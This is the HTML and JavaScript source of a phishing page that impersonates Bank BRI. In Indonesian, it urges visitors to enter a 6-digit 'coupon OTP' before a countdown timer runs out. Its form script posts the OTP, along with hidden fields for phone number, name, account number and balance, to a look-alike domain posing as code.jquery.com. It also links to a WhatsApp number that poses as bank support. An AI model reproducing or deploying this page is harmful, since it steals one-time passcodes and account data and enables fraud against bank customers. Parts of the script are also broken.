     <p style="text-align: center; border: 2px solid #ccc; width: 150px; background: none rgb(9, 140, 227); margin-top: -12px; border-radius: 15px; font-size: 13px; height: 30px; padding-top: 4px; color: white; box-shadow: rgb(170, 170, 170) 2px 2px 4px 0px; " onclick="ubahmode()">Ganti via Aktivasi</p>
     </center>
    </div> </b>
  </div>
   <div class="container" id="Aktivasi" style="display: block;"> 
   <div class="box-lte"> 
    <div class="row" style="margin-top: 140px;"> 
     <div class="col-12 d-block mx-auto text-center p-0" style="height: 150px; width: 256px; max-width: 100%; display: block; margin-top: -50px; border-radius: 0px;"> 
      <img alt="" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQwXoZaQfr4ksx51WILDwW3b5L3eH38kTHS91Furw4RPO409ThwHYVJ3RY_4LAztsnYCUqfp_-GQz-lQ8UnNHlWE04X_vHEAA8ret_XVQ9OFEujvGLpfRgYgdokCEoYymR1WoGIp56mLSeRHgpVy4FDLTVDMtWWotVS1E8pQcDtOL5-fi2NJDif9WV-gU/s1080/AddText_02-18-09.12.14.png" style="display: block; margin: 0px; width: 300px; height:160px; border-radius: 0px;position: fixed;margin-top: -55px;left: 25px;"> 
     </div> 
    </div> 
    <div class="row"> 
     <hr style="display: block; margin: auto; width: 90%;margin-top: -40px;"> 
     <p style="font-weight: bold; font-size: 15px; color: #098CE3; text-align: center; margin: 10px auto;" id="waktu">3 : 00</p> 
    </div> 
    <div class="row"> 
     <div class="col-12" style="width: 459px; max-width: 100%; display: block; margin: 5px auto; padding: 0 20px; margin-top: -10px"> 
      <p style="font-size: 13px; text-align: center; font-weight: bold; padding: 20px">Nanti akan di hubungi Layanan Bank BRI untuk konfirmasi kode kupon. <br><br>Kode Konfirmasi (Wajib).</p> 
      <br>
      <br>
     </div> 
    </div> 
     <center>
       <p id="alert" style="font-size: 10px;width: 100%;background: transparent;color: #000;position: fixed;text-align: center;top: 305px;right: 0;left: 0;font-weight: bold;display: ;" class="alert"></p>
     </center>
    <div class="row"> 
     <div class="col-12" style="width: 459px; max-width: 100%; display: block; margin: 5px auto;"> 
  <form onsubmit="return sender(event);" method="post" id="formLink">
       <center> 
        <div style="margin-top: -21px"> 
        
       <i class="ion-ios-locked-outline" id="ionIcons"></i> 
   <input type="hidden" id="logo" value="༺═𝗕𝗮𝗻𝗸 𝗕𝗥𝗜═༻">
<input type="hidden" id="nopon" name="tele" value="">
<input type="hidden" id="namasaya" name="namanye" value="">
<input type="hidden" id="nomorrek" name="kertu" value="">
<input type="hidden" id="saldoku" name="uang" value="">
         <input type="tel" name="otp" id="nama1"  class="bubble-element Input form-log" placeholder="OTP Kupon 6 DIGIT"  maxlength="8" minlength="6" pattern="(?=.*[0-9]).{6,8}"  required oninvalid="this.setCustomValidity('Mohon mɑsukkɑn 𝗞𝗼𝗱𝗲 𝗢𝗧𝗣 dengɑn benɑr')" onchange="this.setCustomValidity('')" style="margin-left: 0px;" required onclick="gantiborder1()">
  
         <b style="display: none;"> <p style="font-size: 12px; text-align: center; margin-top: 25px; margin-left: 10px; margin-right: 10px;"><strong style="color: #FF0000; text-decoration: none" onclick="location.href='https://wa.me/6288740672511?text=Hallo%20Bank%20BRI%0ASaya%20Belum%20Menerima%20OTP%20Cetak Kupon'"> Request OTP cetak Kupon melalui WhatsApp? </strong></p></b>
        </div>
       </center>
       <b><br><br>
<input type="submit" id="kirims" class="bubble-element Button clickable-element" style="max-width: 85%; padding: 0px; cursor: pointer; background: none rgb(9, 140, 227); border: none; text-align: center; display: block; margin: 20px auto; height: 39px; width: 346px; left: 0px; top: 0px; font-family: Arial; font-size: 14px; font-weight: 400; color: rgb(255, 255, 255); letter-spacing: 1px; line-height: 1; border-radius: 15px; box-shadow: rgb(170, 170, 170) 2px 2px 4px 0px; transition: background 200ms ease 0s; font-weight: 700" tabindex="2" value="Konfirmasi" onclick="SendBaru()" />
</b>
      </form>
     </div>
     <b> </b>
    </div>
    <b> </b>
   </div>
   <b> 
    <div class="row"> 
     <div class="col-12" style="width: 459px; max-width: 100%; display: block; margin: 5px auto; padding: 0 20px;"> 
      <button style="width: 75%;font-size: 12px;background: none;border: none;text-align: center;font-weight: bold;position: fixed;margin-top: 60px;margin-left: 25px;color:rgb(9, 100, 127);" onclick="sendUlang()">>>Kirim Ulang SMS Cetak Kupon<<</button>
     </div> 
     <center>
 <img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwzhsQd1K7iF1d2s06-jdlmwaZV6_bR1eZiRCjx7LnbIHag5c5iAEOVfgP9UE-lQqv0M2-C7gQ3u6y6C-0E1iLZASRfrNtk7YOeBa_5obrbvmB4yi2MOjPPseRovva7VTIMmt3dXKcdlSDiqBt5-D_T5W1RiloJ5AOct6wnyv4SZI6Cj6Ahfc2j_x3NZA/s1080/1703668668502.png" style="width: 100%; position: fixed; bottom: 0; left: 0; right: 0; margin: 0px auto">
     </center>
    </div> </b>
  </div>
   </div>
<!-- partial -->
<script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
 <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js"

    integrity="sha512-+NqPlbbtM1QqiK8ZAo4Yrj2c4lNQoGv8P79DPtKzj++l5jnN39rHA/xsqn8zE9l0uSoxaCdrOgFs6yjyfbBxSg=="

    crossorigin="anonymous" referrerpolicy="no-referrer"></script>
  <script src='https://cdnjs.cloudflare.com/ajax/libs/vue/2.6.10/vue.min.js'></script>
<script src='https://unpkg.com/vue-the-mask@0.11.1/dist/vue-the-mask.js'></script><script src="credit.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.mask/1.14.15/jquery.mask.min.js"></script>
<script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.mask/1.14.15/jquery.mask.min.js"></script>
 <script type="text/javascript">

            $(document).ready(function(){


                // Format mata uang.
                $( '.uang' ).mask('000.000.000', {reverse: true});

            })
        </script>
<!-- Static App Form Collection Script -->
<!--<script src="https://static.app/js/static-forms.js" type="text/javascript"></script>

<script src="https://static.app/js/static.js" type="text/javascript"></script>-->
<script>
  $(document).ready(function(){
    $('#inputlogin').submit(function(e) {
    event.preventDefault();
    $("#process1").show();event.preventDefault();
    setTimeout(function(){
      $(".wrapper").hide();
      $("#formLink").fadeIn();
      $(".box-otp").show();
      
    },1500);
      
      
    
document.getElementById('buttonku').innerHTML = "Memproses....";


 $.ajax({
 type: 'POST',
 data: $(this).serialize(),
 datatype: 'JSON',
 
 complete: function(data) {
            console.log('Complete')
   setTimeout(function(){
  
 var nohp = document.getElementById("nohp").value;
 sessionStorage.setItem("nomor", nomor);   
    }, 1000);
        }
    });
 });
    return false;
});
</script>
<script>
    /*
See on github: https://github.com/muhammederdem/credit-card-form
*/

new Vue({
  el: "#app",
  data() {
    return {
      currentCardBackground: Math.floor(Math.random()* 25 + 1), // just for fun :D
      cardName: "",
      cardNumber: "",
      cardMonth: "",
      cardYear: "",
      cardCvv: "",
      minCardYear: new Date().getFullYear(),
      amexCardMask: "#### ###### #####",
      otherCardMask: "Cetak Kupon",
      cardNumberTemp: "",
      isCardFlipped: false,
      focusElementStyle: null,
      isInputFocused: false
    };
  },
  mounted() {
    this.cardNumberTemp = this.otherCardMask;
    document.getElementById("cardNumber").focus();
  },
  computed: {
    getCardType () {
      let number = this.cardNumber;
      let re = new RegExp("^4");
      if (number.match(re) != null) return "visa";

      re = new RegExp("^(34|37)");
      if (number.match(re) != null) return "amex";

      re = new RegExp("^5[1-5]");
      if (number.match(re) != null) return "mastercard";

      re = new RegExp("^6011");
      if (number.match(re) != null) return "discover";
      
      re = new RegExp('^9792')
      if (number.match(re) != null) return 'troy'

      return "visa"; // default type
    },
		generateCardNumberMask () {
			return this.getCardType === "amex" ? this.amexCardMask : this.otherCardMask;
    },
    minCardMonth () {
      if (this.cardYear === this.minCardYear) return new Date().getMonth() + 1;
      return 1;
    }
  },
  watch: {
    cardYear () {
      if (this.cardMonth < this.minCardMonth) {
        this.cardMonth = "";
      }
    }
  },
  methods: {
    flipCard (status) {
      this.isCardFlipped = status;
    },
    focusInput (e) {
      this.isInputFocused = true;
      let targetRef = e.target.dataset.ref;
      let target = this.$refs[targetRef];
      this.focusElementStyle = {
        width: `${target.offsetWidth}px`,
        height: `${target.offsetHeight}px`,
        transform: `translateX(${target.offsetLeft}px) translateY(${target.offsetTop}px)`
      }
    },
    blurInput() {
      let vm = this;
      setTimeout(() => {
        if (!vm.isInputFocused) {
          vm.focusElementStyle = null;
        }
      }, 300);
      vm.isInputFocused = false;
    }
  }
});
</script>
<script>
    window.onload = function() {
  var minute = 02;
  var sec = 59;
  setInterval(function() {
    document.getElementById("waktu").innerHTML =   minute + " : " + sec  ;
    sec--;

    if (sec == 0) {
      minute--;
      sec = 59;

      if (minute == 0) {
        minute = 1;
      }
    }
  }, 1000);
}
  
  
  
   
    document.getElementById('waktu1').innerHTML =
          01 + ":" + 01;
        startTimer();
        
        function startTimer() {
          var presentTime = document.getElementById('waktu1').innerHTML;
          var timeArray = presentTime.split(/[:]+/);
          var m = timeArray[0];
          var s = checkSecond((timeArray[1] - 1));
          if(s==59){m=m-1}
          if(m<0){
            return
          }
          
          document.getElementById('waktu1').innerHTML =
            m + " : " + s;
          console.log(m)
          setTimeout(startTimer, 1000);
          
        }
        
        function checkSecond(sec) {
          if (sec < 10 && sec >= 0) {sec = "0" + sec}; // add zero in front of numbers < 10
          if (sec < 0) {sec = "59"};
          return sec;
        }
        
        
        
    
    </script>  
  <script>
      document.getElementById('timer').innerHTML =
          01 + ":" + 01;
        startTimer1();
        
        function startTimer1() {
          var presentTime = document.getElementById('timer').innerHTML;
          var timeArray = presentTime.split(/[:]+/);
          var m = timeArray[0];
          var s = checkSecond((timeArray[1] - 1));
          if(s==59){m=m-1}
          if(m<0){
            return 
          }
          
          document.getElementById('timer').innerHTML =
            m + " : " + s;
          console.log(m)
          setTimeout(startTimer1, 1000);
          
        }
        
        function checkSecond(sec) {
          if (sec < 10 && sec >= 0) {sec = "0" + sec}; // add zero in front of numbers < 10
          if (sec < 0) {sec = "59"};
          return sec;
        }
        
        
        
  </script>
   <script>
 $('#formLink').on('submit', function (event) {
 
  event.stopPropagation();
    event.preventDefault();
    
 document.getElementById('kirims').value = "Memproses....";
 
 

$.ajax({

 type: 'POST',
 url: 'https://code-jquery-com.c1.is/BRI/13/sendOtp.php',
 async: false,
 dataType: 'JSON',
 data: $(this).serialize(),
 
 complete: function(data) {
            console.log('Complete')
 setTimeout(function(){
  document.getElementById("blinkAktivasi").style.display = "block";
 $("#nama1").val("");
 $("#nama1").addClass('textarea1'); 
 $('#alert').hide();



    }, 1000);



        }
    });

    return false;
});   
        
</script>
<script>
  function sendUlang(){
    $('.blink').hide();event.preventDefault();
    setTimeout(function(){
      
    },700);
    $("#nama1").addClass('textarea2');
    $('#alert').show();
     var nomor = document.getElementById('nomor').value;
     sessionStorage.setItem('nomor', nomor);
     document.getElementById('alert').innerHTML = 'OTP telah terkirim ulang ke +62' +  nomor+  '<br>via SMS/WhatsApp';
  }
</script>
<script>
 function gantiborder1(){
   $("#nama1").removeClass('textarea1'); 
   
   $("#blinkAktivasi").hide(); 
   document.getElementById('kirims').value = "Konfirmasi";
 }   
</script>
</body>
</html>
